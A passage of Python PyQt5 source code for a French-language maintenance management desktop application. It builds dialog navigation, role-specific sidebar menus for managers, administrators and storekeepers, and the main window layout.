Bontravail_UI(self,self.dialogBonTravail)\n self.uiBonTravail.setupUi(self.dialogBonTravail)\n self.stackedWidget.addWidget(self.dialogBonTravail)\n self.stackedWidget.setCurrentWidget(self.dialogBonTravail)\n def displayDashboard(self):\n self.dialogDashboard = QtWidgets.QDialog()\n self.uiDashboard = Dashboard_UI()\n self.uiDashboard.setupUi(self.dialogDashboard)\n self.stackedWidget.addWidget(self.dialogDashboard)\n self.stackedWidget.setCurrentWidget(self.dialogDashboard)\n def 
displayBonTravailConsulter(self):\n self.dialogBonTravailConsulter = QtWidgets.QDialog()\n self.uiBonTravailConsulter = BontravailConsulter_UI(self)\n self.uiBonTravailConsulter.setupUi(self.dialogBonTravailConsulter)\n self.stackedWidget.addWidget(self.dialogBonTravailConsulter)\n self.stackedWidget.setCurrentWidget(self.dialogBonTravailConsulter)\n def displayEquipement(self):\n self.dialogEquipement = QtWidgets.QDialog()\n self.uiEquipement = Equipement_UI(self,self.dialogEquipement)\n self.uiEquipement.setupUi(self.dialogEquipement)\n self.stackedWidget.addWidget(self.dialogEquipement)\n self.stackedWidget.setCurrentWidget(self.dialogEquipement)\n def displayEquipementConsulter(self):\n self.dialogEquipementConsulter = QtWidgets.QDialog()\n self.uiEquipementConsulter = EquipementConsulter_UI(self)\n self.uiEquipementConsulter.setupUi(self.dialogEquipementConsulter)\n self.stackedWidget.addWidget(self.dialogEquipementConsulter)\n self.stackedWidget.setCurrentWidget(self.dialogEquipementConsulter)\n def displayBonApprovisionment(self):\n self.dialogBonApprovisionment = QtWidgets.QDialog()\n self.uiBonApprovisionment = BonApprovisionment_UI(self)\n self.uiBonApprovisionment.setupUi(self.dialogBonApprovisionment)\n self.stackedWidget.addWidget(self.dialogBonApprovisionment)\n self.stackedWidget.setCurrentWidget(self.dialogBonApprovisionment)\n def displayBonApprovisionmentConsulter(self):\n self.dialogBonApprovisionmentConsulter = QtWidgets.QDialog()\n self.uiBonApprovisionmentConsulter = BonApprovisionmentConsulter_UI()\n self.uiBonApprovisionmentConsulter.setupUi(self.dialogBonApprovisionmentConsulter)\n self.stackedWidget.addWidget(self.dialogBonApprovisionmentConsulter)\n self.stackedWidget.setCurrentWidget(self.dialogBonApprovisionmentConsulter)\n def displayDemandeIntervention(self):\n self.dialogDemandeIntervention = QtWidgets.QDialog()\n self.uiDemandeIntervention = DemandeIntervention_UI(self,self.dialogDemandeIntervention)\n self.uiDemandeIntervention.setupUi(self.dialogDemandeIntervention)\n self.stackedWidget.addWidget(self.dialogDemandeIntervention)\n self.stackedWidget.setCurrentWidget(self.dialogDemandeIntervention)\n def displayDemandeInterventionConsulter(self):\n self.dialogDemandeInterventionConsulter = QtWidgets.QDialog()\n self.uiDemandeInterventionConsulter = DemandeInterventionConsulter_UI(self,self.dialogDemandeInterventionConsulter)\n self.uiDemandeInterventionConsulter.setupUi(self.dialogDemandeInterventionConsulter)\n self.stackedWidget.addWidget(self.dialogDemandeInterventionConsulter)\n self.stackedWidget.setCurrentWidget(self.dialogDemandeInterventionConsulter)\n\n def signOut(self):\n self.dialogSignIn.show()\n self.mainwindow.hide()\n def initialiseRM(self):\n ##############################################################################################################################################################################\n # Responsable Maintenance #\n ##############################################################################################################################################################################\n\n if self.role == 'ResponsableMaintenance':\n\n status,record = ResponsableMaintenanceServices.getResponsableMaintenance(self.matricule)\n if status:\n self.nom=record[0][1]\n self.prenom=record[0][2]\n \n self.affdash()\n self.DashboardBox = QtWidgets.QPushButton(\n text=\"Dashboard\", checkable=True, checked=False\n )\n\n \n\n self.DashboardBox.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n 
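            # [editor's aside] hedged sketch, not in the original source: the stylesheet set on the next line is repeated verbatim for the ResponsableProduction dashboard button further down; a hypothetical helper like this would keep the copies in sync:\r\n            def _menu_button_css(icon_path):\r\n                # same rules as the inline stylesheets, parameterised on the background icon\r\n                return (\"background-image: url(%s);\\n\" % icon_path\r\n                        + \"background-repeat: none;\\n\"\r\n                        + \"padding-left: 50px;\\n\"\r\n                        + \"width: 150px;\\n\"\r\n                        + \"font: 75 16pt 'Arial';\\n\"\r\n                        + \"height: 22px;\\n\"\r\n                        + \"font-weight : bold;\\n\"\r\n                        + \"background-position: center left;\")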
self.DashboardBox.setStyleSheet(\"background-image: url(:/icons/icons/dashboard.png);\\n\"\n \"background-repeat: none;\\n\"\n \"padding-left: 50px;\\n\"\n \"width: 150px;\\n\"\n \"font: 75 16pt 'Arial';\\n\"\n \"height: 22px;\\n\"\n \"font-weight : bold;\\n\"\n \"background-position: center left;\")\n\n self.DashboardBox.clicked.connect(self.displayDashboard)\n self.formLayout.addWidget(self.DashboardBox)\n\n self.DashboardBox.clicked.connect(self.affdash)\n self.DashboardBox.clicked.connect(lambda:self.slideLeftMenu(\"2\"))\n\n self.MaintenanceBox = CollapsibleBox('Maintenance',self.left_menu_top_buttons,2,\":/icons/icons/tools.png\")\n lay = QtWidgets.QVBoxLayout()\n self.MaintenanceBox.toggle_button.pressed.connect(lambda:self.slideLeftMenu(\"2\"))\n\n \n \n\n \n \n \n \n MaintenanceBonTravailPreventifCurative = QtWidgets.QPushButton(\"Bon de Travail\")\n MaintenanceBonTravailPreventifCurative.clicked.connect(lambda:self.slideLeftMenu(\"3\"))\n \n MaintenanceBonTravailPreventifCurative.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n MaintenanceBonTravailPreventifCurative.setStyleSheet(\"height : 17px ;font-weight:bold;\")\n lay.addWidget(MaintenanceBonTravailPreventifCurative)\n \n MaintenanceBonTravailPreventifCurative.clicked.connect(self.displayBonTravail)\n \n self.MaintenanceBox.setContentLayout(lay)\n self.formLayout.addWidget(self.MaintenanceBox)\n\n\n \n self.NotificationsBox = CollapsibleBox('Notifications',self.left_menu_top_buttons,2,\":/icons/icons/notification.png\")\n self.NotificationsBox.toggle_button.pressed.connect(lambda:self.slideLeftMenu(\"2\"))\n lay = QtWidgets.QVBoxLayout()\n NotificationsConsulterDemandesInterventions = QtWidgets.QPushButton(\"Demandes d'Interventions\")\n NotificationsConsulterDemandesInterventions.clicked.connect(lambda:self.slideLeftMenu(\"3\"))\n NotificationsConsulterDemandesInterventions.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n NotificationsConsulterDemandesInterventions.setStyleSheet(\"height : 17px ;font-weight:bold;\")\n\n NotificationsConsulterDemandesInterventions.clicked.connect(self.displayDemandeInterventionConsulter)\n \n \n lay.addWidget(NotificationsConsulterDemandesInterventions)\n self.NotificationsBox.setContentLayout(lay)\n self.formLayout.addWidget(self.NotificationsBox)\n\n self.EquipementsBox = CollapsibleBox('Equipements',self.left_menu_top_buttons,2,\":/icons/icons/truck.png\")\n self.EquipementsBox.toggle_button.pressed.connect(lambda:self.slideLeftMenu(\"2\"))\n lay = QtWidgets.QVBoxLayout()\n\n EquipementsConsulter = QtWidgets.QPushButton(\"Liste Équipements\")\n EquipementsConsulter.clicked.connect(lambda:self.slideLeftMenu(\"3\"))\n EquipementsConsulter.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n EquipementsConsulter.setStyleSheet(\"height : 17px ;font-weight:bold;\")\n\n EquipementsConsulter.clicked.connect(self.displayEquipement)\n lay.addWidget(EquipementsConsulter)\n\n EquipementsDemandeApprovisionnement = QtWidgets.QPushButton(\"Demande d'Approvisionnement\")\n EquipementsDemandeApprovisionnement.clicked.connect(lambda:self.slideLeftMenu(\"3\"))\n EquipementsDemandeApprovisionnement.setStyleSheet(\"height : 17px ;font-weight:bold;\")\n EquipementsDemandeApprovisionnement.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n\n EquipementsDemandeApprovisionnement.clicked.connect(self.displayBonApprovisionment)\n lay.addWidget(EquipementsDemandeApprovisionnement)\n\n self.EquipementsBox.setContentLayout(lay)\n self.formLayout.addWidget(self.EquipementsBox)\n\n 
self.NotificationObject.start_Thread(self.matricule)\n ##############################################################################################################################################################################\n def initialiseRP(self):\n ##############################################################################################################################################################################\n # Responsable Production #\n ##############################################################################################################################################################################\n\n if self.role == 'ResponsableProduction':\n\n status,record = ResponsableProductionServices.getResponsableProduction(self.matricule)\n if status:\n self.nom=record[0][1]\n self.prenom=record[0][2]\n \n self.DashboardBox = QtWidgets.QPushButton(\n text=\"Dashboard\", checkable=True, checked=False\n )\n self.DashboardBox.clicked.connect(lambda:self.slideLeftMenu(\"2\"))\n self.DashboardBox.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n self.DashboardBox.setStyleSheet(\"background-image: url(:/icons/icons/dashboard.png);\\n\"\n \"background-repeat: none;\\n\"\n \"padding-left: 50px;\\n\"\n \"width: 150px;\\n\"\n \"font: 75 16pt 'Arial';\\n\"\n \"height: 22px;\\n\"\n \"font-weight : bold;\\n\"\n \"background-position: center left;\")\n self.formLayout.addWidget(self.DashboardBox)\n\n self.MaintenanceBox = CollapsibleBox('Maintenance',self.left_menu_top_buttons,2,\":/icons/icons/tools.png\")\n self.MaintenanceBox.toggle_button.pressed.connect(lambda:self.slideLeftMenu(\"2\"))\n lay = QtWidgets.QVBoxLayout()\n \n \n MaintenanceBonTravailPreventif = QtWidgets.QPushButton(\"Bons de Travails\")\n MaintenanceBonTravailPreventif.clicked.connect(lambda:self.slideLeftMenu(\"3\"))\n MaintenanceBonTravailPreventif.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n MaintenanceBonTravailPreventif.setStyleSheet(\"height : 17px ;font-weight:bold;\")\n lay.addWidget(MaintenanceBonTravailPreventif)\n\n MaintenanceBonTravailPreventif.clicked.connect(self.displayBonTravailConsulter)\n\n MaintenanceDemandesInterventions = QtWidgets.QPushButton(\"Demandes d'Interventions\")\n MaintenanceDemandesInterventions.clicked.connect(lambda:self.slideLeftMenu(\"3\"))\n MaintenanceDemandesInterventions.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n MaintenanceDemandesInterventions.setStyleSheet(\"height : 17px ;font-weight:bold;\")\n lay.addWidget(MaintenanceDemandesInterventions)\n\n MaintenanceDemandesInterventions.clicked.connect(self.displayDemandeInterventionConsulter)\n \n self.MaintenanceBox.setContentLayout(lay)\n self.formLayout.addWidget(self.MaintenanceBox)\n\n\n \n\n\n self.UsersBox = CollapsibleBox('Utilisateurs',self.left_menu_top_buttons,2,\":/icons/icons/group.png\")\n self.UsersBox.toggle_button.pressed.connect(lambda:self.slideLeftMenu(\"2\"))\n lay = QtWidgets.QVBoxLayout()\n\n UtilisateursConsulter = QtWidgets.QPushButton(\"Responsables Chaines-Productions\")\n UtilisateursConsulter.clicked.connect(lambda:self.slideLeftMenu(\"3\"))\n UtilisateursConsulter.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n UtilisateursConsulter.setStyleSheet(\"height : 17px ;font-weight:bold;\")\n lay.addWidget(UtilisateursConsulter)\n\n\n self.UsersBox.setContentLayout(lay)\n self.formLayout.addWidget(self.UsersBox)\n\n\n self.EquipementsBox = CollapsibleBox('Equipements',self.left_menu_top_buttons,2,\":/icons/icons/truck.png\")\n 
self.EquipementsBox.toggle_button.pressed.connect(lambda:self.slideLeftMenu(\"2\"))\n lay = QtWidgets.QVBoxLayout()\n\n EquipementsConsulter = QtWidgets.QPushButton(\"Liste Équipements\")\n EquipementsConsulter.clicked.connect(lambda:self.slideLeftMenu(\"3\"))\n EquipementsConsulter.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n EquipementsConsulter.setStyleSheet(\"height : 17px ;font-weight:bold;\")\n lay.addWidget(EquipementsConsulter)\n\n EquipementsConsulter.clicked.connect(self.displayEquipementConsulter)\n\n EquipementsBonApprovisionnement = QtWidgets.QPushButton(\"Demandes d'Approvisionnements\")\n EquipementsBonApprovisionnement.clicked.connect(lambda:self.slideLeftMenu(\"3\"))\n EquipementsBonApprovisionnement.setStyleSheet(\"height : 17px ;font-weight:bold;\")\n EquipementsBonApprovisionnement.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n lay.addWidget(EquipementsBonApprovisionnement)\n\n EquipementsBonApprovisionnement.clicked.connect(self.displayBonApprovisionmentConsulter)\n\n self.EquipementsBox.setContentLayout(lay)\n self.formLayout.addWidget(self.EquipementsBox)\n ##############################################################################################################################################################################\n def initialiseRCP(self):\n ##############################################################################################################################################################################\n # Responsable Chaine Production #\n ##############################################################################################################################################################################\n\n if self.role==\"ResponsableChaineProduction\":\n\n status,record = ResponsableChaineProductionServices.getResponsableChaineProduction(self.matricule)\n if status:\n self.nom=record[0][1]\n self.prenom=record[0][2]\n\n self.DashboardBox = QtWidgets.QPushButton(\n text=\"Dashboard\", checkable=True, checked=False\n )\n self.DashboardBox.clicked.connect(lambda:self.slideLeftMenu(\"2\"))\n self.DashboardBox.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n self.DashboardBox.setStyleSheet(\"background-image: url(:/icons/icons/dashboard.png);\\n\"\n \"background-repeat: none;\\n\"\n \"padding-left: 50px;\\n\"\n \"font: 75 16pt 'Arial';\\n\"\n \"width: 150px;\\n\"\n \"height: 22px;\\n\"\n \"font-weight: bold;\\n\"\n \"background-position: center left;\")\n self.formLayout.addWidget(self.DashboardBox)\n\n\n self.MaintenanceBox = CollapsibleBox('Maintenance',self.left_menu_top_buttons,1,\":/icons/icons/tools.png\")\n self.MaintenanceBox.toggle_button.pressed.connect(lambda:self.slideLeftMenu(\"2\"))\n lay = QtWidgets.QVBoxLayout()\n\n MaintenanceDemandeIntervention = QtWidgets.QPushButton(\"Demandes d'Interventions\")\n MaintenanceDemandeIntervention.clicked.connect(lambda:self.slideLeftMenu(\"3\"))\n MaintenanceDemandeIntervention.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n MaintenanceDemandeIntervention.setStyleSheet(\"height: 17px;font-weight: bold;\")\n lay.addWidget(MaintenanceDemandeIntervention)\n\n self.MaintenanceBox.setContentLayout(lay)\n self.formLayout.addWidget(self.MaintenanceBox)\n\n\n self.NotificationsBox = CollapsibleBox('Notifications',self.left_menu_top_buttons,1,\":/icons/icons/notification.png\")\n self.NotificationsBox.toggle_button.pressed.connect(lambda:self.slideLeftMenu(\"2\"))\n lay = QtWidgets.QVBoxLayout()\n\n NotificationValidation = 
QtWidgets.QPushButton(\"Validation de Réception\")\n NotificationValidation.clicked.connect(lambda:self.slideLeftMenu(\"3\"))\n NotificationValidation.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n NotificationValidation.setStyleSheet(\"height: 17px;font-weight: bold;\")\n lay.addWidget(NotificationValidation)\n\n self.NotificationsBox.setContentLayout(lay)\n self.formLayout.addWidget(self.NotificationsBox)\n\n\n self.EquipementsBox = CollapsibleBox('Equipements',self.left_menu_top_buttons,1,\":/icons/icons/truck.png\")\n self.EquipementsBox.toggle_button.pressed.connect(lambda:self.slideLeftMenu(\"2\"))\n lay = QtWidgets.QVBoxLayout()\n\n ConsulterEquipement = QtWidgets.QPushButton(\"Liste Equipements\")\n ConsulterEquipement.clicked.connect(lambda:self.slideLeftMenu(\"3\"))\n ConsulterEquipement.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n ConsulterEquipement.setStyleSheet(\"height: 17px;font-weight: bold;\")\n lay.addWidget(ConsulterEquipement)\n\n self.EquipementsBox.setContentLayout(lay)\n self.formLayout.addWidget(self.EquipementsBox)\n\n ConsulterEquipement.clicked.connect(self.displayEquipement)\n MaintenanceDemandeIntervention.clicked.connect(self.displayDemandeIntervention)\n \n\n\n\n\n\n\n\n\n ################################################################################################################################################################\n def initialiseAdmin(self):\n ###############################################################################################################################################################\n # Administrateur #\n ###############################################################################################################################################################\n\n\n if self.role==\"Administrateur\":\n\n '''status,record = ResponsableChaineProductionServices.getResponsableChaineProduction(self.matricule)\n if status:\n self.nom=record[0][1]\n self.prenom=record[0][2]'''\n self.nom=\"\"\n self.prenom=\"\"\n \n self.DashboardBox = QtWidgets.QPushButton(\n text=\"Dashboard\", checkable=True, checked=False\n )\n self.DashboardBox.clicked.connect(lambda:self.slideLeftMenu(\"2\"))\n self.DashboardBox.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n self.DashboardBox.setStyleSheet(\"background-image: url(:/icons/icons/dashboard.png);\\n\"\n \"background-repeat: none;\\n\"\n \"padding-left: 50px;\\n\"\n \"font: 75 16pt 'Arial';\\n\"\n \"width: 150px;\\n\"\n \"font-weight: bold;\\n\"\n \"height: 22px;\\n\"\n \"background-position: center left;\")\n\n self.DashboardBox.clicked.connect(self.displayDashboard)\n self.formLayout.addWidget(self.DashboardBox)\n\n\n self.MaintenanceBox = CollapsibleBox('Maintenance',self.left_menu_top_buttons,2,\":/icons/icons/tools.png\")\n self.MaintenanceBox.toggle_button.pressed.connect(lambda:self.slideLeftMenu(\"2\"))\n lay = QtWidgets.QVBoxLayout()\n\n \n MaintenanceBonTravail = QtWidgets.QPushButton(\"Bons de Travails\")\n MaintenanceBonTravail.clicked.connect(lambda:self.slideLeftMenu(\"3\"))\n MaintenanceBonTravail.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n MaintenanceBonTravail.setStyleSheet(\"height: 17px;font-weight: bold;\")\n lay.addWidget(MaintenanceBonTravail)\n\n MaintenanceBonTravail.clicked.connect(self.displayBonTravailConsulter)\n\n DemandeInterventioon = QtWidgets.QPushButton(\"Demande Interventions\")\n DemandeInterventioon.clicked.connect(lambda:self.slideLeftMenu(\"3\"))\n 
DemandeInterventioon.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n DemandeInterventioon.setStyleSheet(\"height: 17px;font-weight: bold;\")\n lay.addWidget(DemandeInterventioon)\n\n DemandeInterventioon.clicked.connect(self.displayDemandeInterventionConsulter)\n \n self.MaintenanceBox.setContentLayout(lay)\n self.formLayout.addWidget(self.MaintenanceBox)\n\n\n\n self.UtilisateurBox = CollapsibleBox('Utilisateurs',self.left_menu_top_buttons,2,\":/icons/icons/group.png\")\n self.UtilisateurBox.toggle_button.pressed.connect(lambda:self.slideLeftMenu(\"2\"))\n lay = QtWidgets.QVBoxLayout()\n\n CRUDUtilisateur = QtWidgets.QPushButton(\"Liste D'utilisateurs\")\n CRUDUtilisateur.clicked.connect(lambda:self.slideLeftMenu(\"3\"))\n CRUDUtilisateur.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n CRUDUtilisateur.setStyleSheet(\"height: 17px;font-weight: bold;\")\n lay.addWidget(CRUDUtilisateur)\n\n self.UtilisateurBox.setContentLayout(lay)\n self.formLayout.addWidget(self.UtilisateurBox)\n\n\n self.EquipementsBox = CollapsibleBox('Equipements',self.left_menu_top_buttons,2,\":/icons/icons/truck.png\")\n self.EquipementsBox.toggle_button.pressed.connect(lambda:self.slideLeftMenu(\"2\"))\n lay = QtWidgets.QVBoxLayout()\n\n ListeEquipement = QtWidgets.QPushButton(\"Liste d'Equipements\")\n ListeEquipement.clicked.connect(lambda:self.slideLeftMenu(\"3\"))\n ListeEquipement.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n ListeEquipement.setStyleSheet(\"height: 17px;font-weight: bold;\")\n lay.addWidget(ListeEquipement)\n\n ListeEquipement.clicked.connect(self.displayEquipementConsulter)\n\n EquipementsDemandeApprovisionnement = QtWidgets.QPushButton(\"Demande d'Approvisionnements\")\n EquipementsDemandeApprovisionnement.clicked.connect(lambda:self.slideLeftMenu(\"3\"))\n EquipementsDemandeApprovisionnement.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n EquipementsDemandeApprovisionnement.setStyleSheet(\"height: 17px;font-weight: bold;\")\n lay.addWidget(EquipementsDemandeApprovisionnement)\n\n EquipementsDemandeApprovisionnement.clicked.connect(self.displayBonApprovisionmentConsulter)\n\n\n self.EquipementsBox.setContentLayout(lay)\n self.formLayout.addWidget(self.EquipementsBox)\n\n CRUDUtilisateur.clicked.connect(self.handleadd)\n def initialiseMagasinier(self):\n ################################################################################################################\n #Magasiner\n #################################################################################################################\n if self.role==\"Magasinier\":\n\n status,record = MagasinierServices.getMagasinier(self.matricule)\n if status:\n self.nom=record[0][1]\n self.prenom=record[0][2]\n\n \n self.DashboardBox = QtWidgets.QPushButton(\n text=\"Dashboard\", checkable=True, checked=False\n )\n self.DashboardBox.clicked.connect(lambda:self.slideLeftMenu(\"3\"))\n self.DashboardBox.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n self.DashboardBox.setStyleSheet(\"background-image: url(:/icons/icons/dashboard.png);\\n\"\n \"background-repeat: none;\\n\"\n \"padding-left: 50px;\\n\"\n \"font: 75 16pt 'Arial';\\n\"\n \"width: 150px;\\n\"\n \"font-weight: bold;\\n\"\n \"height: 22px;\\n\"\n \"background-position: center left;\")\n self.formLayout.addWidget(self.DashboardBox)\n\n\n self.NotificationsBox = CollapsibleBox('Notifications',self.left_menu_top_buttons,1,\":/icons/icons/notification.png\")\n self.NotificationsBox.toggle_button.pressed.connect(lambda:self.slideLeftMenu(\"2\"))\n 
lay = QtWidgets.QVBoxLayout()\n\n NotificationValidation = QtWidgets.QPushButton(\"Validation de Réception\")\n NotificationValidation.clicked.connect(lambda:self.slideLeftMenu(\"3\"))\n NotificationValidation.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n NotificationValidation.setStyleSheet(\"height: 17px;font-weight: bold;\")\n lay.addWidget(NotificationValidation)\n\n self.NotificationsBox.setContentLayout(lay)\n self.formLayout.addWidget(self.NotificationsBox)\n\n\n self.EquipementsBox = CollapsibleBox('Equipements',self.left_menu_top_buttons,2,\":/icons/icons/truck.png\")\n self.EquipementsBox.toggle_button.pressed.connect(lambda:self.slideLeftMenu(\"2\"))\n lay = QtWidgets.QVBoxLayout()\n\n ListeEquipement = QtWidgets.QPushButton(\"Liste Piéces de Rechanges\")\n ListeEquipement.clicked.connect(lambda:self.slideLeftMenu(\"3\"))\n ListeEquipement.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n ListeEquipement.setStyleSheet(\"height: 17px;font-weight: bold;\")\n lay.addWidget(ListeEquipement)\n\n EquipementsDemandeApprovisionnement = QtWidgets.QPushButton(\"Demande d'Approvisionnements\")\n EquipementsDemandeApprovisionnement.clicked.connect(lambda:self.slideLeftMenu(\"3\"))\n EquipementsDemandeApprovisionnement.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n EquipementsDemandeApprovisionnement.setStyleSheet(\"height: 17px;font-weight: bold;\")\n lay.addWidget(EquipementsDemandeApprovisionnement)\n\n\n self.EquipementsBox.setContentLayout(lay)\n self.formLayout.addWidget(self.EquipementsBox)\n\n\n\n ################################################################################################################\n def initialiseMainWindow(self):\n self.initialiseRM()\n self.initialiseRP()\n self.initialiseRCP()\n self.initialiseAdmin()\n self.initialiseMagasinier()\n self.LabesSpace.setText(\"Space \"+self.role+\"( \"+self.matricule +\" \"+self.nom+\" \"+self.prenom+\" )\")\n \n def setupUi(self, MainWindow):\n MainWindow.setObjectName(\"MainWindow\")\n MainWindow.resize(1225, 717)\n self.centralwidget = QtWidgets.QWidget(MainWindow)\n self.centralwidget.setStyleSheet(\"\")\n self.centralwidget.setObjectName(\"centralwidget\")\n self.verticalLayout = QtWidgets.QVBoxLayout(self.centralwidget)\n self.verticalLayout.setContentsMargins(0, 0, 0, 0)\n self.verticalLayout.setSpacing(0)\n self.verticalLayout.setObjectName(\"verticalLayout\")\n self.main_header = QtWidgets.QFrame(self.centralwidget)\n self.main_header.setMaximumSize(QtCore.QSize(16777215, 50))\n self.main_header.setStyleSheet(\"QFrame{\\n\"\n\" \\n\"\n\" background-color: #22333B;\\n\"\n\"}\")\n self.main_header.setFrameShape(QtWidgets.QFrame.WinPanel)\n self.main_header.setFrameShadow(QtWidgets.QFrame.Raised)\n self.main_header.setObjectName(\"main_header\")\n self.horizontalLayout_2 = QtWidgets.QHBoxLayout(self.main_header)\n self.horizontalLayout_2.setContentsMargins(0, 0, 0, 0)\n self.horizontalLayout_2.setSpacing(0)\n self.horizontalLayout_2.setObjectName(\"horizontalLayout_2\")\n self.tittle_bar_container = QtWidgets.QFrame(self.main_header)\n self.tittle_bar_container.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.tittle_bar_container.setFrameShadow(QtWidgets.QFrame.Raised)\n self.tittle_bar_container.setObjectName(\"tittle_bar_container\")\n self.horizontalLayout_5 = QtWidgets.QHBoxLayout(self.tittle_bar_container)\n self.horizontalLayout_5.setContentsMargins(0, 0, 0, 0)\n self.horizontalLayout_5.setSpacing(0)\n self.horizontalLayout_5.setObjectName(\"horizontalLayout_5\")\n 
self.left_menu_toggle = QtWidgets.QFrame(self.tittle_bar_container)\n self.left_menu_toggle.setMinimumSize(QtCore.QSize(50, 0))\n self.left_menu_toggle.setMaximumSize(QtCore.QSize(50, 16777215))\n self.left_menu_toggle.setStyleSheet(\"QFrame{\\n\"\n\"\\n\"\n\"}\\n\"\n\"QPushButton{\\n\"\n\" padding: 5px 10px;\\n\"\n\" border: none;\\n\"\n\" border-radius: 5px;\\n\"\n\" background-color: #00A8E8;\\n\"\n\" color: white;\\n\"\n\"}\\n\"\n\"QPushButton:hover{\\n\"\n\" background-color: rgb(0, 92, 157);\\n\"\n\"}\")\n self.left_menu_toggle.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.left_menu_toggle.setFrameShadow(QtWidgets.QFrame.Raised)\n self.left_menu_toggle.setObjectName(\"left_menu_toggle\")\n self.horizontalLayout_4 = QtWidgets.QHBoxLayout(self.left_menu_toggle)\n self.horizontalLayout_4.setContentsMargins(0, 0, 0, 0)\n self.horizontalLayout_4.setSpacing(0)\n self.horizontalLayout_4.setObjectName(\"horizontalLayout_4\")\n self.left_menu_toggle_btn = QtWidgets.QPushButton(self.left_menu_toggle)\n self.left_menu_toggle_btn.setMinimumSize(QtCore.QSize(0, 40))\n self.left_menu_toggle_btn.setMaximumSize(QtCore.QSize(50, 16777215))\n self.left_menu_toggle_btn.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n self.left_menu_toggle_btn.setStyleSheet(\"background-image: url(:/icons/icons/menu.png);\\n\"\n\"background-repeat: none;\\n\"\n\"padding-left: 50px;\\n\"\n\"background-position: center ;\")\n self.left_menu_toggle_btn.setText(\"\")\n icon = QtGui.QIcon()\n icon.addPixmap(QtGui.QPixmap(\":/icons/icons/cil-menu.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n self.left_menu_toggle_btn.setIcon(icon)\n self.left_menu_toggle_btn.setIconSize(QtCore.QSize(24, 24))\n self.left_menu_toggle_btn.setObjectName(\"left_menu_toggle_btn\")\n self.horizontalLayout_4.addWidget(self.left_menu_toggle_btn)\n self.horizontalLayout_5.addWidget(self.left_menu_toggle)\n self.tittle_bar = QtWidgets.QFrame(self.tittle_bar_container)\n self.tittle_bar.setLayoutDirection(QtCore.Qt.LeftToRight)\n self.tittle_bar.setStyleSheet(\"\")\n self.tittle_bar.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.tittle_bar.setFrameShadow(QtWidgets.QFrame.Raised)\n self.tittle_bar.setObjectName(\"tittle_bar\")\n self.horizontalLayout_3 = QtWidgets.QHBoxLayout(self.tittle_bar)\n self.horizontalLayout_3.setObjectName(\"horizontalLayout_3\")\n self.LabesSpace = QtWidgets.QLabel(self.tittle_bar)\n font = QtGui.QFont()\n font.setPointSize(12)\n font.setBold(True)\n font.setWeight(75)\n self.LabesSpace.setFont(font)\n self.LabesSpace.setStyleSheet(\"color:white;\")\n self.LabesSpace.setText(\"\")\n self.LabesSpace.setAlignment(QtCore.Qt.AlignCenter)\n self.LabesSpace.setObjectName(\"LabesSpace\")\n self.horizontalLayout_3.addWidget(self.LabesSpace)\n self.horizontalLayout_5.addWidget(self.tittle_bar)\n self.horizontalLayout_2.addWidget(self.tittle_bar_container)\n self.verticalLayout.addWidget(self.main_header)\n self.main_body = QtWidgets.QFrame(self.centralwidget)\n self.main_body.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.main_body.setFrameShadow(QtWidgets.QFrame.Raised)\n self.main_body.setObjectName(\"main_body\")\n self.horizontalLayout = QtWidgets.QHBoxLayout(self.main_body)\n self.horizontalLayout.setContentsMargins(0, 0, 0, 0)\n self.horizontalLayout.setSpacing(0)\n self.horizontalLayout.setObjectName(\"horizontalLayout\")\n self.left_side_menu = QtWidgets.QFrame(self.main_body)\n self.left_side_menu.setMaximumSize(QtCore.QSize(75, 16777215))\n font = QtGui.QFont()\n font.setFamily(\"Arial\")\n 
font.setPointSize(14)\n font.setBold(True)\n font.setWeight(75)\n self.left_side_menu.setFont(font)\n self.left_side_menu.setStyleSheet(\"background-color: #22333B;\")\n self.left_side_menu.setFrameShape(QtWidgets.QFrame.NoFrame)\n self.left_side_menu.setFrameShadow(QtWidgets.QFrame.Raised)\n self.left_side_menu.setObjectName(\"left_side_menu\")\n self.verticalLayout_3 = QtWidgets.QVBoxLayout(self.left_side_menu)\n self.verticalLayout_3.setContentsMargins(7, 0, 0, 0)\n self.verticalLayout_3.setSpacing(0)\n self.verticalLayout_3.setObjectName(\"verticalLayout_3\")\n self.scrollArea = QtWidgets.QScrollArea(self.left_side_menu)\n self.scrollArea.setStyleSheet(\"\")\n self.scrollArea.setHorizontalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff)\n self.scrollArea.setWidgetResizable(True)\n self.scrollArea.setObjectName(\"scrollArea\")\n self.left_menu_top_buttons = QtWidgets.QWidget()\n self.left_menu_top_buttons.setGeometry(QtCore.QRect(0, 0, 66, 571))\n self.left_menu_top_buttons.setStyleSheet(\"QPushButton{\\n\"\n\" padding: 20px 